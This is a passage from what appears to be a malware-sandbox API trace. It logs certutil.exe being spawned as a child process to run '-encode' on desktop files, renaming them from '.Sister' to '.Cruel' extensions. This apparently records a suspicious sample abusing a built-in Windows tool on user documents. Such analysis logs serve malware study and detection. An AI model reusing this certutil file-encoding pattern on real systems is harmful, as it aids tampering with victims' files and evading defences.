wMilliseconds=0x45)) [0283.529] SystemTimeToFileTime (in: lpSystemTime=0xe4eea7faa0, lpFileTime=0xe4eea7fa98 | out: lpFileTime=0xe4eea7fa98) returned 1 [0283.530] FileTimeToLocalFileTime (in: lpFileTime=0xe4eea7fa98, lpLocalFileTime=0xe4eea7fa60 | out: lpLocalFileTime=0xe4eea7fa60) returned 1 [0283.530] FileTimeToSystemTime (in: lpFileTime=0xe4eea7fa60, lpSystemTime=0xe4eea7f7d0 | out: lpSystemTime=0xe4eea7f7d0) returned 1 [0283.530] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xe4eea7f7d0, lpFormat=0x0, lpDateStr=0xe4eea7f8e0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0283.530] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xe4eea7f7d0, lpFormat=0x0, lpTimeStr=0xe4eea7f7e0, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0283.530] _vsnwprintf (in: _Buffer=0xe4eea7f7ee, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xe4eea7f7b8 | out: _Buffer=" 58.069s") returned 8 [0283.530] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2541d84e4a0 [0283.530] SetLastError (dwErrCode=0x80070716) [0283.530] _vsnwprintf (in: _Buffer=0xe4eea7f868, _BufferCount=0xb, _Format="%d", _ArgList=0xe4eea7f858 | out: _Buffer="948") returned 3 [0283.530] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xe4eea7f620, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0283.530] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2541d84b6a0 [0283.530] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2541d844300 [0283.531] LocalFree (hMem=0x2541d84e4a0) returned 0x0 [0283.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe4eea7fb10 | out: lpSystemTimeAsFileTime=0xe4eea7fb10*(dwLowDateTime=0xd39b3892, dwHighDateTime=0x1d6141f)) [0283.531] GetLocalTime (in: lpSystemTime=0xe4eea7fb48 | out: lpSystemTime=0xe4eea7fb48*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x47)) [0283.531] SystemTimeToFileTime (in: lpSystemTime=0xe4eea7fb48, lpFileTime=0xe4eea7fb20 | out: lpFileTime=0xe4eea7fb20) returned 1 [0283.531] CompareFileTime (lpFileTime1=0xe4eea7fb20, lpFileTime2=0xe4eea7fb10) returned 1 [0283.531] _vsnwprintf (in: _Buffer=0xe4eea7fb58, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xe4eea7fae8 | out: _Buffer="GMT + 2.00") returned 10 [0283.531] LocalFree (hMem=0x2541d84bba0) returned 0x0 [0283.531] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0283.532] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0283.532] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0283.532] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0283.532] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0283.532] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xe4eea7fb88 | out: _Buffer="10.0.15063.447") returned 14 [0283.532] GetACP () returned 0x4e4 [0283.532] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0283.532] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2541d84b600 [0283.532] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2541d84b600, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0283.532] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2541d84e420 [0283.532] _vsnwprintf (in: _Buffer=0x2541d84e420, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe4eea7fbd8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0283.532] LocalFree (hMem=0x2541d84b600) returned 0x0 [0283.532] LocalFree (hMem=0x0) returned 0x0 [0283.532] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0283.533] GetACP () returned 0x4e4 [0283.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0283.533] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2541d84b6c0 [0283.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2541d84b6c0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0283.533] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2541d84e1a0 [0283.533] _vsnwprintf (in: _Buffer=0x2541d84e1a0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe4eea7fbd8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0283.533] LocalFree (hMem=0x2541d84b6c0) returned 0x0 [0283.533] LocalFree (hMem=0x0) returned 0x0 [0283.533] GetACP () returned 0x4e4 [0283.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0283.533] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2541d84b4e0 [0283.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2541d84b4e0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0283.533] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2541d84df60 [0283.533] _vsnwprintf (in: _Buffer=0x2541d84df60, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe4eea7fc08 | out: _Buffer="10.0.15063.447 retail") returned 21 [0283.533] LocalFree (hMem=0x2541d84b4e0) returned 0x0 [0283.533] LocalFree (hMem=0x2541d84e420) returned 0x0 [0283.533] LocalFree (hMem=0x2541d84e1a0) returned 0x0 [0283.533] LocalFree (hMem=0x2541d84df60) returned 0x0 [0283.533] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0283.534] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0283.534] GetStockObject (i=0) returned 0x900010 [0283.534] RegisterClassW (lpWndClass=0xe4eea7fd30) returned 0xc1a2 [0283.534] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1202c6 [0283.629] NtdllDefWindowProc_W () returned 0x0 [0283.629] NtdllDefWindowProc_W () returned 0x1 [0283.637] NtdllDefWindowProc_W () returned 0x0 [0283.648] UpdateWindow (hWnd=0x1202c6) returned 1 [0283.648] PostMessageW (hWnd=0x1202c6, Msg=0x400, wParam=0x0, lParam=0x2541d83217e) returned 1 [0283.648] GetMessageW (in: lpMsg=0xe4eea7fd80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe4eea7fd80) returned 1 [0283.648] TranslateMessage (lpMsg=0xe4eea7fd80) returned 0 [0283.648] DispatchMessageW (lpMsg=0xe4eea7fd80) returned 0x0 [0283.648] NtdllDefWindowProc_W () returned 0x0 [0283.648] GetMessageW (in: lpMsg=0xe4eea7fd80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe4eea7fd80) returned 1 [0283.648] TranslateMessage (lpMsg=0xe4eea7fd80) returned 0 [0283.648] DispatchMessageW (lpMsg=0xe4eea7fd80) returned 0x0 [0283.648] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x2541d83f350 [0283.648] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x2541d834430 [0283.649] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0283.649] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0283.649] SetLastError (dwErrCode=0x80070716) [0283.649] _vsnwprintf (in: _Buffer=0xe4eea7f788, _BufferCount=0xb, _Format="%d", _ArgList=0xe4eea7f778 | out: _Buffer="465") returned 3 [0283.649] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xe4eea7f540, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0283.649] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2541d83b780 [0283.649] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0283.649] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0283.649] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xe4eea7f520, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0283.649] GetLastError () returned 0xcb [0283.650] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0283.650] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0283.650] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0283.650] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0283.650] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0283.650] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0283.650] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0283.650] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0283.650] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0283.650] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0283.650] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0283.650] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0283.650] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0283.650] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0283.650] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0283.650] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0283.650] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0283.650] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0283.650] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0283.651] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0283.651] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0283.651] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xe4eea7f1e8 | out: phkResult=0xe4eea7f1e8*=0x23c) returned 0x0 [0283.651] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2541d839180 [0283.651] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xe4eea7f758, lpData=0xe4eea7f788, lpcbData=0xe4eea7f750*=0x4 | out: lpType=0xe4eea7f758*=0x0, lpData=0xe4eea7f788*=0x0, lpcbData=0xe4eea7f750*=0x4) returned 0x2 [0283.651] LocalFree (hMem=0x2541d839180) returned 0x0 [0283.651] RegCloseKey (hKey=0x23c) returned 0x0 [0283.651] LocalFree (hMem=0x0) returned 0x0 [0283.651] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2541d85cca0 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0283.703] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0283.703] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0283.703] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2541d861b00 [0283.704] GetComputerNameW (in: lpBuffer=0x2541d861b00, nSize=0xe4eea7f750 | out: lpBuffer="NQDPDE", nSize=0xe4eea7f750) returned 1 [0283.704] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xe4eea7f720 | out: lpBuffer=0x0, nSize=0xe4eea7f720) returned 0 [0283.704] GetLastError () returned 0xea [0283.704] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2541d84b980 [0283.704] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2541d84b980, nSize=0xe4eea7f720 | out: lpBuffer="NQdPdE", nSize=0xe4eea7f720) returned 1 [0283.705] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0283.708] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2541d861de0, cbCertEncoded=0x7a94) returned 0x0 [0283.711] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2541d861de0, cbCrlEncoded=0x7a94) returned 0x0 [0283.712] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2541d861de0, cbEncoded=0x7a94, dwFlags=0x8000, pDecodePara=0xe4eea7f600, pvStructInfo=0xe4eea7f690, pcbStructInfo=0xe4eea7f684 | out: pvStructInfo=0xe4eea7f690, pcbStructInfo=0xe4eea7f684) returned 0 [0283.712] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2541d861de0, cbEncoded=0x7a94, dwFlags=0x8000, pDecodePara=0xe4eea7f600, pvStructInfo=0xe4eea7f690, pcbStructInfo=0xe4eea7f684 | out: pvStructInfo=0xe4eea7f690, pcbStructInfo=0xe4eea7f684) returned 0 [0283.712] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2541d861de0, cbEncoded=0x7a94, dwFlags=0x8000, pDecodePara=0xe4eea7f600, pvStructInfo=0xe4eea7f690, pcbStructInfo=0xe4eea7f684 | out: pvStructInfo=0xe4eea7f690, pcbStructInfo=0xe4eea7f684) returned 0 [0283.712] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2541d845670 [0283.768] CryptMsgUpdate (hCryptMsg=0x2541d845670, pbData=0x2541d861de0, cbData=0x7a94, fFinal=1) returned 0 [0283.768] GetLastError () returned 0x8009310b [0283.768] CryptMsgClose (hCryptMsg=0x2541d845670) returned 1 [0283.769] GetFileAttributesExW (in: lpFileName="zuXa5tA1VeTtCxZv.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\zuxa5ta1vettcxzv.gif.sister"), fInfoLevelId=0x0, lpFileInformation=0xe4eea7f6b0 | out: lpFileInformation=0xe4eea7f6b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af0ff20, ftCreationTime.dwHighDateTime=0x1d5eaf6, ftLastAccessTime.dwLowDateTime=0x51221bc0, ftLastAccessTime.dwHighDateTime=0x1d5ed64, ftLastWriteTime.dwLowDateTime=0x51221bc0, ftLastWriteTime.dwHighDateTime=0x1d5ed64, nFileSizeHigh=0x0, nFileSizeLow=0x7a94)) returned 1 [0283.769] _vsnwprintf (in: _Buffer=0xe4eea7f6b8, _BufferCount=0xb, _Format="%d", _ArgList=0xe4eea7f6a8 | out: _Buffer="359") returned 3 [0283.769] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xe4eea7f470, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0283.769] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2541d861980 [0283.769] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0283.769] _vsnwprintf (in: _Buffer=0xe4eea7e6a0, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xe4eea7f6f8 | out: _Buffer="Input Length = 31380") returned 20 [0283.769] GetFileType (hFile=0x50) returned 0x2 [0283.769] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe4eea7e6a0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xe4eea7e654, lpReserved=0x0 | out: lpBuffer=0xe4eea7e6a0*, lpNumberOfCharsWritten=0xe4eea7e654*=0x14) returned 1 [0283.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0283.841] _vsnwprintf (in: _Buffer=0xe4eea7e6a0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe4eea7f6f8 | out: _Buffer="\n") returned 1 [0283.841] GetFileType (hFile=0x50) returned 0x2 [0283.841] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe4eea7e6a0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe4eea7e654, lpReserved=0x0 | out: lpBuffer=0xe4eea7e6a0*, lpNumberOfCharsWritten=0xe4eea7e654*=0x1) returned 1 [0284.030] GetFileAttributesExW (in: lpFileName="zuXa5tA1VeTtCxZv.gif.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\zuxa5ta1vettcxzv.gif.cruel"), fInfoLevelId=0x0, lpFileInformation=0xe4eea7f6b0 | out: lpFileInformation=0xe4eea7f6b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3d7f334, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xd3d7f334, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd3e00e54, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xa8c4)) returned 1 [0284.031] _vsnwprintf (in: _Buffer=0xe4eea7f6b8, _BufferCount=0xb, _Format="%d", _ArgList=0xe4eea7f6a8 | out: _Buffer="361") returned 3 [0284.031] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xe4eea7f470, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0284.031] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2541d861a10 [0284.031] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0284.031] _vsnwprintf (in: _Buffer=0xe4eea7e6a0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xe4eea7f6f8 | out: _Buffer="Output Length = 43204") returned 21 [0284.031] GetFileType (hFile=0x50) returned 0x2 [0284.031] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe4eea7e6a0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xe4eea7e654, lpReserved=0x0 | out: lpBuffer=0xe4eea7e6a0*, lpNumberOfCharsWritten=0xe4eea7e654*=0x15) returned 1 [0284.163] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0284.163] _vsnwprintf (in: _Buffer=0xe4eea7e6a0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe4eea7f6f8 | out: _Buffer="\n") returned 1 [0284.163] GetFileType (hFile=0x50) returned 0x2 [0284.163] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe4eea7e6a0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe4eea7e654, lpReserved=0x0 | out: lpBuffer=0xe4eea7e6a0*, lpNumberOfCharsWritten=0xe4eea7e654*=0x1) returned 1 [0284.256] LocalFree (hMem=0x2541d861de0) returned 0x0 [0284.256] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0284.257] _vsnwprintf (in: _Buffer=0xe4eea7f718, _BufferCount=0xb, _Format="%d", _ArgList=0xe4eea7f708 | out: _Buffer="2022") returned 4 [0284.257] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xe4eea7f4d0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0284.257] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2541d838a40 [0284.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0284.257] _vsnwprintf (in: _Buffer=0xe4eea7e700, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xe4eea7f758 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0284.257] GetFileType (hFile=0x50) returned 0x2 [0284.257] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe4eea7e700*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xe4eea7e6b4, lpReserved=0x0 | out: lpBuffer=0xe4eea7e700*, lpNumberOfCharsWritten=0xe4eea7e6b4*=0x31) returned 1 [0284.344] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0284.344] _vsnwprintf (in: _Buffer=0xe4eea7e700, _BufferCount=0x1ff, _Format="\n", _ArgList=0xe4eea7f758 | out: _Buffer="\n") returned 1 [0284.344] GetFileType (hFile=0x50) returned 0x2 [0284.344] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xe4eea7e700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xe4eea7e6b4, lpReserved=0x0 | out: lpBuffer=0xe4eea7e700*, lpNumberOfCharsWritten=0xe4eea7e6b4*=0x1) returned 1 [0284.434] LocalFree (hMem=0x0) returned 0x0 [0284.434] LocalFree (hMem=0x2541d834430) returned 0x0 [0284.434] LocalFree (hMem=0x2541d83f350) returned 0x0 [0284.434] SetLastError (dwErrCode=0x80070716) [0284.434] _vsnwprintf (in: _Buffer=0xe4eea7f788, _BufferCount=0xb, _Format="%d", _ArgList=0xe4eea7f778 | out: _Buffer="511") returned 3 [0284.434] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xe4eea7f540, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0284.434] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2541d8619e0 [0284.434] PostQuitMessage (nExitCode=0) [0284.434] GetMessageW (in: lpMsg=0xe4eea7fd80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe4eea7fd80) returned 0 [0284.434] LocalFree (hMem=0x2541d84b980) returned 0x0 [0284.434] LocalFree (hMem=0x2541d861b00) returned 0x0 [0284.434] LocalFree (hMem=0x0) returned 0x0 [0284.435] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0284.436] GetLastError () returned 0x7e [0284.436] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0284.436] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0284.436] DllMain () returned 0x1 [0284.436] LocalFree (hMem=0x2541d84b6a0) returned 0x0 [0284.436] LocalFree (hMem=0x2541d83b780) returned 0x0 [0284.436] LocalFree (hMem=0x2541d861980) returned 0x0 [0284.436] LocalFree (hMem=0x2541d861a10) returned 0x0 [0284.436] LocalFree (hMem=0x2541d838a40) returned 0x0 [0284.436] LocalFree (hMem=0x2541d8619e0) returned 0x0 [0284.436] LocalFree (hMem=0x2541d844300) returned 0x0 [0284.436] LocalFree (hMem=0x2541d83bba0) returned 0x0 [0284.437] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0284.437] GetLastError () returned 0x7e [0284.437] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0284.437] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0284.437] DllMain () returned 0x1 [0284.437] exit (_Code=0) Thread: id = 108 os_tid = 0x11b4 Process: id = "41" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x22aaf000" os_pid = "0x1150" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"_zyi016uyI EccZobgM.pptx.Sister\" \"_zyi016uyI EccZobgM.pptx.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 109 os_tid = 0x1244 [0287.216] GetStartupInfoW (in: lpStartupInfo=0xaa8db9f910 | out: lpStartupInfo=0xaa8db9f910*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"_zyi016uyI EccZobgM.pptx.Sister\" \"_zyi016uyI EccZobgM.pptx.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0287.223] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0287.223] __set_app_type (_Type=0x1) [0287.223] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0287.224] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0287.226] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0287.226] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0287.226] GetModuleHandleW 